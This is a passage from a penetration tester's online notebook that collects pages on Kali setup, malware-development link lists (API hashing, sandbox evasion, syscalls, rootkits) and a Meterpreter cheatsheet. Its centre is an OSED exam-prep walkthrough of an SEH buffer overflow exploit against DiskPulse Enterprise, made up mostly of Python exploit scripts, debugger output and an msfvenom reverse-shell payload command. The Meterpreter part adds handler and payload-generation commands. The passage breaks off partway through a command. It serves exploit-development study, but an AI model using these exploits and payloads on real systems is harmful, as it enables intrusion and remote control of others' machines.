[Markdown](https://ppn.snovvcra.sh/admin/virtualization/vmware.md) . * [https://www.kali.org/docs/virtualization/install-vmware-guest-tools/](https://www.kali.org/docs/virtualization/install-vmware-guest-tools/) [](https://ppn.snovvcra.sh/admin/virtualization/vmware#shared-folders) Shared Folders ------------------------------------------------------------------------------------------ * [https://linuxhint.com/mount\_vmware\_shares\_command\_line\_linux\_vm/](https://linuxhint.com/mount_vmware_shares_command_line_linux_vm/) List shares: Copy $ vmware-hgfsclient Mount: Copy $ sudo mkdir /mnt/share-host $ sudo mount -t fuse.vmhgfs-fuse .host:/share-host /mnt/share-host Or $ sudo vmhgfs-fuse .host:/share-host /mnt/share-host -o allow_other,uid=$UID,gid=$GID $ echo '.host:/share-host /mnt/share-host fuse.vmhgfs-fuse defaults,allow_other,uid=1001,gid=1001 0 0' >> /etc/fstab Last updated 3 years ago --- # Kali | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/linux/kali.md) . * [https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/](https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/) [](https://ppn.snovvcra.sh/admin/linux/kali#branches) Branches ------------------------------------------------------------------- Switch to the most stable branch: Copy $ echo "deb http://http.kali.org/kali kali-last-snapshot main non-free contrib" | sudo tee /etc/apt/sources.list [](https://ppn.snovvcra.sh/admin/linux/kali#setup-checklist) Setup Checklist --------------------------------------------------------------------------------- Mix settings list (both for hardware install and virtualization): Copy [VM] Disable screen lock (Power Manager -> Display, Security -> OFF) [VM] Configure networks (+ remember to configure VBox DHCP first) [All] Update && Upgrade (+ change /etc/apt/sources.list to HTTPS if getting "403 Forbidden" because of AV) $ sudo apt update && sudo upgrade -y $ sudo reboot [VM] Install guest additions * Insert Guest Additions CD image and open terminal there $ cp /media/cdrom0/VBoxLinuxAdditions.run ~/Desktop && chmod 755 ~/Desktop/VBoxLinuxAdditions.run && sudo ~/Desktop/VBoxLinuxAdditions.run $ sudo reboot $ rm ~/Desktop/VBoxLinuxAdditions.run && sudo eject [ALL] Manage users * Enable root or create new user SWITCH { CASE (root): $ sudo -i $ passwd root * Re-login as root CASE (non-root): $ sudo useradd -m -s /bin/bash -u 1337 snovvcrash $ sudo passwd snovvcrash $ sudo usermod -aG sudo snovvcrash * Re-login as snovvcrash } * Disable kali user [VM] SWITCH { CASE (lock): $ sudo usermod -L kali $ sudo usermod -s /sbin/nologin kali $ sudo chage -E0 kali CASE (delete): $ sudo userdel -r kali } [ALL] Configure sudo * Increase sudo password timeout value or disable password prompt completely $ sudo visudo SWITCH { CASE (increase timeout): $ sudo sh -c 'echo "Defaults env_reset,timestamp_timeout=45" > /etc/sudoers.d/snovvcrash' CASE (disable password): $ sudo sh -c 'echo "snovvcrash ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/snovvcrash' } [ALL] Clone dotfiles $ git clone https://github.com/snovvcrash/dotfiles-linux ~/.dotfiles [ALL] Run ~/.dotfiles/00-autoconfig scripts on the discretion [](https://ppn.snovvcra.sh/admin/linux/kali#console-logging) Console Logging --------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/linux/kali#script) script ### [](https://ppn.snovvcra.sh/admin/linux/kali#tmux) tmux * [https://github.com/tmux-plugins/tmux-logging](https://github.com/tmux-plugins/tmux-logging) ### [](https://ppn.snovvcra.sh/admin/linux/kali#ts) ts ### [](https://ppn.snovvcra.sh/admin/linux/kali#time-in-prompt) Time in Prompt #### [](https://ppn.snovvcra.sh/admin/linux/kali#bash) bash `~/.bashrc` (replace `!` with `%`): #### [](https://ppn.snovvcra.sh/admin/linux/kali#zsh) zsh `$ZSH_CUSTOM/themes/robbyrussell.zsh-theme` (replace `!` with `%`): [](https://ppn.snovvcra.sh/admin/linux/kali#tricks) Tricks --------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/linux/kali#paperify) Paperify When dealing with an engagement where there's no internet access available on the adversary's box, one can use [paperify](https://github.com/alisinabh/paperify) to send data to her teammates (hashes to brute force, for example). Zip the hashes with best compression, base64 the archive and create a QR code: Translate the QR code with your favorite mobile app and send the contents via a secure channel (e. g., a messenger). Now your teammates can reverse the process to get the initial zip file: ### [](https://ppn.snovvcra.sh/admin/linux/kali#debian-to-kali) Debian to Kali Last updated 8 months ago * [Branches](https://ppn.snovvcra.sh/admin/linux/kali#branches) * [Setup Checklist](https://ppn.snovvcra.sh/admin/linux/kali#setup-checklist) * [Console Logging](https://ppn.snovvcra.sh/admin/linux/kali#console-logging) * [script](https://ppn.snovvcra.sh/admin/linux/kali#script) * [tmux](https://ppn.snovvcra.sh/admin/linux/kali#tmux) * [ts](https://ppn.snovvcra.sh/admin/linux/kali#ts) * [Time in Prompt](https://ppn.snovvcra.sh/admin/linux/kali#time-in-prompt) * [Tricks](https://ppn.snovvcra.sh/admin/linux/kali#tricks) * [Paperify](https://ppn.snovvcra.sh/admin/linux/kali#paperify) * [Debian to Kali](https://ppn.snovvcra.sh/admin/linux/kali#debian-to-kali) Copy $ script ~/ws/shells/`date "+%FT%H%M%S"`.script $ for i in `grep -anr '\... OK' | rev | cut -d: -f2 | rev | awk -F" " '{print $3}' | sort -u | grep . | cut -d: -f1`; do proxychains4 -q dig +tcp +noall +answer $i @192.168.1.11 | grep IN; sleep $((1+RANDOM % 3)); done Copy bash ~/.tmux/plugins/tmux-logging/scripts/screen_capture.sh bash ~/.tmux/plugins/tmux-logging/scripts/save_complete_history.sh Copy $ sudo apt install moreutils -y $ command | ts '[%Y-%m-%d %H:%M:%S]' | tee command.log Copy PS1='${debian_chroot:!($debian_chroot)}[\D!d}|\D{!k:!M}] \[\033[01;32m\]λ \[\033[00m\]\[\033[01;34m\]\w\[\033[00m\] '\ \ Copy\ \ PROMPT="!(?:!{$fg_bold[green]!}➜ :!{$fg_bold[red]!}➜ ) "\ PROMPT+='!{$fg[cyan]!}!(4~|!-1~/…/!2~|!3~)!{$reset_color!} $(git_prompt_info)'\ \ if lsof -tac script "$(tty)" > /dev/null; then\ PROMPT="[!D{!d}|!D{!k:!M}]* $PROMPT"\ else\ PROMPT="[!D{!d}|!D{!k:!M}] $PROMPT"\ fi\ \ Copy\ \ $ 7z a -t7z -m0=lzma -mx=9 -mfb=64 -md=32m -ms=on archive.7z tgsrep.in\ $ base64 -w0 archive.7z > 7z\ $ ./paperify.sh 7z\ \ Copy\ \ PS > .\b64decode.ps1 .\b64.txt out.7z\ \ b64decode.ps1\ \ Copy\ \ $IN = $args[0]\ $OUT = $args[1]\ $data = [IO.File]::ReadAllText("$pwd\$IN")\ [IO.File]::WriteAllBytes("$pwd\$OUT", [Convert]::FromBase64String($data))\ \ Copy\ \ sudo sh -c 'echo "\ndeb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list'\ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys ED444FF07D8D0BF6\ sudo apt update\ sudo apt install kali-tools-top10 -y --- # API Hashing | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/api-hashing.md) . * [https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware](https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware) * [https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection](https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection) [](https://ppn.snovvcra.sh/red-team/dev/api-hashing#examples) Examples --------------------------------------------------------------------------- * [https://github.com/helpsystems/nanodump/blob/main/scripts/randomize\_sw2\_seed.py](https://github.com/helpsystems/nanodump/blob/main/scripts/randomize_sw2_seed.py) Last updated 3 years ago --- # Sandbox Evasion | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/sandbox-evasion.md) . * [https://github.com/Arvanaghi/CheckPlease](https://github.com/Arvanaghi/CheckPlease) * [https://github.com/LordNoteworthy/al-khaser](https://github.com/LordNoteworthy/al-khaser) * [https://0xpat.github.io/Malware\_development\_part\_2/](https://0xpat.github.io/Malware_development_part_2/) Last updated 8 months ago --- # Windows API | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/winapi.md) . * [https://yuval0x92.wordpress.com/2020/03/09/native-api-win32-api/](https://yuval0x92.wordpress.com/2020/03/09/native-api-win32-api/) * [https://github.com/EspressoCake/NativeFunctionStaticMap/blob/main/Native\_API\_Resolve.pdf](https://github.com/EspressoCake/NativeFunctionStaticMap/blob/main/Native_API_Resolve.pdf) * [https://github.com/LloydLabs/Windows-API-Hashing](https://github.com/LloydLabs/Windows-API-Hashing) * [https://github.com/MohitDabas/malwinx](https://github.com/MohitDabas/malwinx) * [https://fourcore.io/blogs/how-a-windows-process-is-created-part-1](https://fourcore.io/blogs/how-a-windows-process-is-created-part-1) * [https://fourcore.io/blogs/how-a-windows-process-is-created-part-2](https://fourcore.io/blogs/how-a-windows-process-is-created-part-2) [](https://ppn.snovvcra.sh/red-team/dev/winapi#tools) Tools ---------------------------------------------------------------- * [https://github.com/MalwareApiLib/MalwareApiLibrary](https://github.com/MalwareApiLib/MalwareApiLibrary) * [https://www.leeholmes.com/managing-ini-files-with-powershell/](https://www.leeholmes.com/managing-ini-files-with-powershell/) Last updated 1 year ago --- # Kernel Mode | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/kernel-mode.md) . [](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#lord-of-the-ring0) Lord Of The Ring0 --------------------------------------------------------------------------------------------- * [Part 1 | Introduction](https://idov31.github.io/2022/07/14/lord-of-the-ring0-p1.html) * [Part 2 | A tale of routines, IOCTLs and IRPs](https://idov31.github.io/2022/08/04/lord-of-the-ring0-p2.html) * [Part 3 | Sailing to the land of the user (and debugging the ship)](https://idov31.github.io/2022/10/30/lord-of-the-ring0-p3.html) * [Part 4 | The call back home](https://idov31.github.io/2023/02/24/lord-of-the-ring0-p4.html) * [Part 5 | Saruman's Manipulation](https://idov31.github.io/2023/07/19/lord-of-the-ring0-p5.html) * [https://github.com/Idov31/Nidhogg](https://github.com/Idov31/Nidhogg) [](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#rootkits) Rootkits --------------------------------------------------------------------------- * [https://github.com/daem0nc0re/VectorKernel](https://github.com/daem0nc0re/VectorKernel) [](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#tools) Tools --------------------------------------------------------------------- * [https://github.com/lem0nSec/KBlast](https://github.com/lem0nSec/KBlast) [](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#kkexecdd) KKExecDD --------------------------------------------------------------------------- * [https://github.com/floesen/KExecDD](https://github.com/floesen/KExecDD) * [https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html](https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html) * [https://github.com/scrt/KexecDDPlus](https://github.com/scrt/KexecDDPlus) Last updated 9 months ago * [Lord Of The Ring0](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#lord-of-the-ring0) * [Rootkits](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#rootkits) * [Tools](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#tools) * [KKExecDD](https://ppn.snovvcra.sh/red-team/dev/kernel-mode#kkexecdd) --- # Syscalls | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/syscalls.md) . * [https://alice.climent-pommeret.red/posts/a-syscall-journey-in-the-windows-kernel/](https://alice.climent-pommeret.red/posts/a-syscall-journey-in-the-windows-kernel/) * [https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/](https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/) * [https://www.solomonsklash.io/syscalls-for-shellcode-injection.html](https://www.solomonsklash.io/syscalls-for-shellcode-injection.html) * [https://jmpesp.me/malware-analysis-syscalls-example/](https://jmpesp.me/malware-analysis-syscalls-example/) * [https://klezvirus.github.io/RedTeaming/AV\_Evasion/NoSysWhisper/](https://klezvirus.github.io/RedTeaming/AV_Evasion/NoSysWhisper/) * [https://labs.cognisys.group/posts/Combining-Indirect-Dynamic-Syscalls-and-API-Hashing/](https://labs.cognisys.group/posts/Combining-Indirect-Dynamic-Syscalls-and-API-Hashing/) * [https://hadess.io/edr-evasion-techniques-using-syscalls/](https://hadess.io/edr-evasion-techniques-using-syscalls/) [](https://ppn.snovvcra.sh/red-team/dev/syscalls#sharpcall) SharpCall -------------------------------------------------------------------------- * [https://jhalon.github.io/utilizing-syscalls-in-csharp-1/](https://jhalon.github.io/utilizing-syscalls-in-csharp-1/) * [https://jhalon.github.io/utilizing-syscalls-in-csharp-2/](https://jhalon.github.io/utilizing-syscalls-in-csharp-2/) * [https://github.com/jhalon/SharpCall](https://github.com/jhalon/SharpCall) [](https://ppn.snovvcra.sh/red-team/dev/syscalls#hellsgate) HellsGate -------------------------------------------------------------------------- * [https://redops.at/en/blog/exploring-hells-gate](https://redops.at/en/blog/exploring-hells-gate) * [https://xakep.ru/2023/08/08/hells-gate/](https://xakep.ru/2023/08/08/hells-gate/) [](https://ppn.snovvcra.sh/red-team/dev/syscalls#recycledgate-tartarusgate) RecycledGate / TartarusGate ------------------------------------------------------------------------------------------------------------ * [https://labs.nettitude.com/blog/creating-an-opsec-safe-loader-for-red-team-operations/](https://labs.nettitude.com/blog/creating-an-opsec-safe-loader-for-red-team-operations/) * [https://github.com/thefLink/RecycledGate](https://github.com/thefLink/RecycledGate) * [https://github.com/nettitude/Tartarus-TpAllocInject](https://github.com/nettitude/Tartarus-TpAllocInject) Last updated 2 years ago * [SharpCall](https://ppn.snovvcra.sh/red-team/dev/syscalls#sharpcall) * [HellsGate](https://ppn.snovvcra.sh/red-team/dev/syscalls#hellsgate) * [RecycledGate / TartarusGate](https://ppn.snovvcra.sh/red-team/dev/syscalls#recycledgate-tartarusgate) --- # OSED SEH Overflow | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/exploit-dev/bof/osed-sehof.md) . * [https://jasonturley.xyz/windows-exploit-development-part-2-structured-exception-handler-seh-overflow/](https://jasonturley.xyz/windows-exploit-development-part-2-structured-exception-handler-seh-overflow/) * [https://github.com/stephenbradshaw/vulnserver](https://github.com/stephenbradshaw/vulnserver) All you need to know about the SEH Overflow challenge for OSED exam preparation. The example below was made when building an exploit for DiskPulse Enterprise v10.0.12. Other versions of this exploit are: * [https://www.exploit-db.com/exploits/42778](https://www.exploit-db.com/exploits/42778) * [https://github.com/snowcra5h/DiskPulse-Exploit](https://github.com/snowcra5h/DiskPulse-Exploit) [](https://ppn.snovvcra.sh/exploit-dev/bof/osed-sehof#id-0.-common-code) 0\. Common Code --------------------------------------------------------------------------------------------- Copy import struct import socket def LE(num): return struct.pack('' send(buf) Copy 0:012> !teb TEB at 00258000 ExceptionList: 023aff54 0:012> dt _EXCEPTION_REGISTRATION_RECORD 023aff54 ntdll!_EXCEPTION_REGISTRATION_RECORD +0x000 Next : 0x32664431 _EXCEPTION_REGISTRATION_RECORD +0x004 Handler : 0x44336644 _EXCEPTION_DISPOSITION +44336644 Or 0:012> !exchain 023aff54: 44336644 Invalid exception stack at 32664431 Copy $ msf-pattern_offset -l 6000 -q 44336644 [*] Exact match at offset 2499 sehof\_confirm.py Copy #!/usr/bin/env python3 size = 6000 filler = b'A' * 2499 handler = LE(0xd34dc0d3) junk = b'C' * (size - len(filler + handler)) buf = filler + handler + junk send(buf) sehof\_bad\_chars.py Copy #!/usr/bin/env python3 size = 6000 badchars = ( b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10' b'\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20' b'\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30' b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40' b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50' b'\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60' b'\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70' b'\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80' b'\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90' b'\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0' b'\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0' b'\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0' b'\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0' b'\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0' b'\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0' b'\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' ) filler = b'A' * 2499 handler = LE(0xd34dc0d3) junk = b'C' * (size - len(filler + handler + badchars)) buf = filler + handler + badchars + junk send(buf) Copy PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py Copy 0:012> g; dds esp L3 01c7b8f8 77e06f82 ntdll!ExecuteHandler2+0x26 01c7b8fc 01c7ba00 01c7b900 01c7ff54 0:012> db 01c7ff54+8 L100 Or 0:012> .load pykd 0:012> !py C:\OSED\find-bad-chars.py -a 01c7ff54 Copy $ msf-nasm_shell nasm > pop eax 00000000 58 pop eax nasm > pop ebx 00000000 5B pop ebx nasm > pop ecx 00000000 59 pop ecx nasm > pop edx 00000000 5A pop edx nasm > pop esi 00000000 5E pop esi nasm > pop edi 00000000 5F pop edi nasm > pop ebp 00000000 5D pop ebp nasm > ret 00000000 C3 ret Copy 0:012> load .narly 0:012> !nmod 10000000 10221000 libspp /SafeSEH OFF C:\Program Files\Vuln Software\bin\libspp.dll find\_ppr.wds Copy .block { .for (r $t0 = 0x58; $t0 < 0x5F; r $t0 = $t0 + 0x01) { .for (r $t1 = 0x58; $t1 < 0x5F; r $t1 = $t1 + 0x01) { s-[1]b 10000000 10221000 $t0 $t1 c3 } } } Copy 0:012> $> u 101576c0 L3 libspp!pcre_exec+0x16450: 101576c0 58 pop eax 101576c1 5b pop ebx 101576c2 c3 ret sehof\_ppr.py Copy #!/usr/bin/env python3 size = 6000 exp = b'' exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret filler = b'A' * 2499 junk = b'C' * (size - len(filler + exp)) buf = filler + exp + junk send(buf) Copy 0:012> .load pykd.dll 0:012> !py C:\OSED\find-ppr.py -m libspp -b 00 [+] searching libspp for pop r32; pop r32; ret [+] BADCHARS: \x00 [OK] libspp::0x101576c0: pop eax; pop ebx; ret ; \xC0\x76\x15\x10 ... Copy PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py Breakpoint 0 hit eax=00000000 ebx=00000000 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 eip=101576c0 esp=01c4b8f8 ebp=01c4b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 libspp!pcre_exec+0x16450: 101576c0 58 pop eax 0:012> t eax=77e06f82 ebx=00000000 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 eip=101576c1 esp=01c4b8fc ebp=01c4b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 libspp!pcre_exec+0x16451: 101576c1 5b pop ebx 0:012> t eax=77e06f82 ebx=01c4ba00 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 eip=101576c2 esp=01c4b900 ebp=01c4b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 libspp!pcre_exec+0x16452: 101576c2 c3 ret 0:012> t eax=77e06f82 ebx=01c4ba00 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 eip=01c4ff54 esp=01c4b904 ebp=01c4b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 01c4ff54 41 inc ecx 0:012> dds eip L4 01c4ff54 41414141 01c4ff58 101576c0 libspp!pcre_exec+0x16450 01c4ff5c 43434343 01c4ff60 43434343 0:012> a 01c4ff54 jmp 0x01c4ff5c 01c4ff56 0:012> u eip L1 01c4ff54 eb06 jmp 01c4ff5c sehof\_nseh.py Copy #!/usr/bin/env python3 size = 6000 exp = LE(0x06eb9090) # (NSEH) jmp +06 exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret #exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction filler = b'A' * (2499 - 4) junk = b'C' * (size - len(filler + exp)) buf = filler + exp + junk send(buf) Copy 0:012> t eax=77e06f82 ebx=01c4ba00 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 eip=01c4ff56 esp=01c4b904 ebp=01c4b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 01c4ff56 eb06 jmp 01c4ff5e 0:012> dd 01c4ff5e - 0x06 01c4ff58 101576c0 43434343 43434343 43434343 01c4ff68 43434343 43434343 43434343 43434343 01c4ff78 43434343 43434343 43434343 43434343 01c4ff88 43434343 43434343 43434343 43434343 01c4ff98 43434343 43434343 43434343 43434343 01c4ffa8 43434343 43434343 43434343 43434343 01c4ffb8 43434343 43434343 43434343 43434343 01c4ffc8 43434343 43434343 43434343 43434343 sehof\_shellcode\_region.py Copy #!/usr/bin/env python3 size = 6000 shellcode_size = 600 shellcode = LE(0xd34dc0d3) shellcode += b'C' * (shellcode_size - len(shellcode)) exp = LE(0x06eb9090) # (NSEH) jmp +06 exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction filler = b'A' * (2499 - 4) nop = b'\x90' * (size - len(filler + exp + shellcode)) buf = filler + exp + shellcode + nop print(f'buf({len(buf)}): filler({len(filler)}) -> exp({len(exp)}) -> shellcode({len(shellcode)}) -> nop({len(nop)})') send(buf) Copy 0:012> dd eip L1 01caff5e d34dc0d3 0:012> !teb TEB at 002d2000 ExceptionList: 01cab90c StackBase: 01cb0000 StackLimit: 01caa000 0:012> s -b 01caa000 01cb0000 d3 c0 4d d3 43 43 43 43 43 43 43 43 01cac856 d3 c0 4d d3 43 43 43 43-43 43 43 43 43 43 43 43 ..M.CCCCCCCCCCCC 01cadaae d3 c0 4d d3 43 43 43 43-43 43 43 43 43 43 43 43 ..M.CCCCCCCCCCCC 01caed06 d3 c0 4d d3 43 43 43 43-43 43 43 43 43 43 43 43 ..M.CCCCCCCCCCCC 01caff5e d3 c0 4d d3 43 43 43 43-43 43 43 43 43 43 43 43 ..M.CCCCCCCCCCCC 0:012> dd 01cac856 L96 01cac856 d34dc0d3 43434343 43434343 43434343 ... ... ... ... ... 01cacaa6 43434343 43434343 0:012> ? 01cac856 - @esp Evaluate expression: 3922 = 00000f52 Copy $ msf-nasm_shell nasm > add esp, 0xf52 00000000 81C4520F0000 add esp,0xf52 // Contains bad zero bytes nasm > add sp, 0xf52 00000000 6681C4520F add sp,0xf52 nasm > jmp esp 00000000 FFE4 jmp esp sehof\_island\_hop.py Copy #!/usr/bin/env python3 size = 6000 shellcode_size = 600 shellcode = LE(0xd34dc0d3) shellcode += b'C' * (shellcode_size - len(shellcode)) exp = LE(0x06eb9090) # (NSEH) jmp +06 exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction exp += b'\x66\x81\xc4\x52\x0f' # (Island Hop) add sp, 0xf50 exp += b'\xff\xe4' # (Island Hop) jmp esp filler = b'A' * (2499 - 4) nop = b'\x90' * (size - len(filler + exp + shellcode)) buf = filler + exp + shellcode + nop print(f'buf({len(buf)}): filler({len(filler)}) -> exp({len(exp)}) -> shellcode({len(shellcode)}) -> nop({len(nop)})') send(buf) Copy 0:012> t eax=771f6f82 ebx=01d6ba00 ecx=101576c0 edx=771f6fa0 esi=00000000 edi=00000000 eip=01d6ff5e esp=01d6b904 ebp=01d6b918 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 01d6ff5e 6681c4520f add sp,0F52h 0:012> t eax=771f6f82 ebx=01d6ba00 ecx=101576c0 edx=771f6fa0 esi=00000000 edi=00000000 eip=01d6ff63 esp=01d6c856 ebp=01d6b918 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 01d6ff63 ffe4 jmp esp {01d6c856} 0:012> dd @esp L4 01d3c856 d34dc0d3 43434343 43434343 43434343 Copy 0:012> u @esp L5 01d6c856 6681c4520f add sp,0F52h 01d6c85b ffe4 jmp esp 01d6c85d d3c0 rol eax,cl 01d6c85f 4d dec ebp Copy 0:012> ? 01c6c85a - @eip Evaluate expression: -14084 = ffffc8fc Copy >>> from keystone import * >>> ks = Ks(KS_ARCH_X86, KS_MODE_32) >>> jump = [f'\\x{int(opcode):02x}' for opcode in ks.asm("jmp 0xffffc8fc;")[0]] >>> print(f"""b'{''.join(jump)}'""") ("\xe9\xf7\xc8\xff\xff") sehof\_exploit.py Copy #!/usr/bin/env python3 size = 6000 shellcode_size = 600 shellcode = b'\x90' * 20 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode # sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST eth0; set LPORT 1337; set EXITFUNC thread; run' shellcode += b"" shellcode += b'C' * (shellcode_size - len(shellcode)) exp = LE(0x06eb9090) # (NSEH) jmp +06 exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction #exp += b'\x66\x81\xc4\x52\x0f' # (Island Hop) add sp, 0xf50 #exp += b'\xff\xe4' # (Island Hop) jmp esp exp += b'\xe9\xf7\xc8\xff\xff' # jmp 0xffffc8fc filler = b'A' * (2499 - 4) nop = b'\x90' * (size - len(filler + exp + shellcode)) buf = filler + exp + shellcode + nop print(f'buf({len(buf)}): filler({len(filler)}) -> exp({len(exp)}) -> shellcode({len(shellcode)}) -> nop({len(nop)})') send(buf) --- # Meterpreter | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/meterpreter.md) . * [https://buffered.io/posts/staged-vs-stageless-handlers/](https://buffered.io/posts/staged-vs-stageless-handlers/) * [https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/](https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/) * [https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation](https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation) * [https://xakep.ru/2020/07/03/metasploit-guide/](https://xakep.ru/2020/07/03/metasploit-guide/) * [https://diablohorn.com/2013/02/21/we-bypassed-antivirus-how-about-idsips/](https://diablohorn.com/2013/02/21/we-bypassed-antivirus-how-about-idsips/) * [https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023](https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023) [](https://ppn.snovvcra.sh/pentest/c2/meterpreter#cheatsheet) Cheatsheet ----------------------------------------------------------------------------- Quick handler launch: Copy msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x] Bind RC4 payload & handler through SOCKS proxy: Copy $ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe msf > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4 msf exploit(multi/handler) > set RHOST 192.168.1.11 msf exploit(multi/handler) > set LPORT 443 msf exploit(multi/handler) > set RC4PASSWORD Passw0rd! msf 